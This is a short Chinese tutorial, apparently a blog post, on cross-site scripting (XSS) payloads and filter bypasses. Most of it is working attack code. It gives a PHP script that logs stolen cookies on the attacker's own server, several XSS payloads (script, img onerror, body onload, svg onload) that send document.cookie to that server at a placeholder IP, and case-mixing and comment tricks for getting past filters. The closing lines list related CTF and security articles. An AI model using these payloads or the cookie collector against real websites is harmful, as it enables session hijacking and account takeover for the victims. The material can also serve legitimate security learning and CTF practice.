XSS漏洞--常用payload及绕过

前置准备

  1. 首先准备一个自己的服务器。本地服务器,也就是127.0.0.1不行。
  2. 在服务器的公开的、可访问的目录下准备一个.php文件。我这里命名为flag.php。
  3. flag.php的源代码:
php 复制代码
//flag.php
<?php
$cookie = $_GET['cookie'];
$log = fopen("cookie.txt", "a");
fwrite($log, $cookie . "\n");
fclose($log);
?>

代码的作用是保存从目标服务器盗取的Cookie。
前置知识的学习看这里

payload的基本形式

php 复制代码
//js脚本形式
<script>location.href="http://xx.xx.xx.xx/flag.php?cookie="+document.cookie</script>

//img标签。onerror是图片加载失败时触发的事件。
<img src='#' onerror="window.location.href='http://xx.xx.xx.xx/flag.php?cookie='+document.cookie"/>

//body标签。onload是页面加载完成时触发的事件。
<body onload="location.href='http://xx.xx.xx.xx/flag.php?cookie='+document.cookie"/>

//svg标签。
<svg onload="location.href='http://xx.xx.xx.xx/flag.php?cookie='+document.cookie"/>

绕过方法

大小写绕过:

php 复制代码
<ScRipT> <IMg> <BOdy> <SvG>

空格被过滤:

php 复制代码
使用/**/ 或者 / 绕过
<body/onload="location.href='http://xx.xx.xx.xx/flag.php?cookie='+document.cookie"/>
<body/**/onload="location.href='http://xx.xx.xx.xx/flag.php?cookie='+document.cookie"/>
相关推荐
pandarking7 分钟前
[CTF]攻防世界:题目名称-warmup
android·web安全·网络安全
介一安全5 小时前
【Frida Android】实战篇12:企业常用对称加密场景 Hook 教程
android·网络安全·逆向·安全性测试·frida
北京耐用通信6 小时前
阀岛的“超级大脑”:耐达讯自动化网关让EtherNet/IP转DeviceNet“说同一种语言”
人工智能·物联网·网络协议·网络安全·自动化·信息与通信
三七吃山漆7 小时前
攻防世界——fakebook
android·网络安全·web·ctf
Suckerbin10 小时前
Solar应急响应8月赛 勒索环境溯源排查
web安全·网络安全·安全威胁分析
m0_7381207210 小时前
渗透测试——靶机Sar1渗透横向详细过程
开发语言·python·安全·web安全·网络安全·ssh·php
Ping32文件安全10 小时前
文件加密软件选择哪款?精选这六款文件加密软件
安全·web安全
白帽子凯哥哥11 小时前
渗透测试技术:从入门到实战的完整指南
web安全·渗透测试·人才培养·产教融合·湖南省网安基地
漏洞文库-Web安全11 小时前
2021qwb [强网先锋]赌徒 Writeup + 环境复现
安全·web安全·网络安全·ctf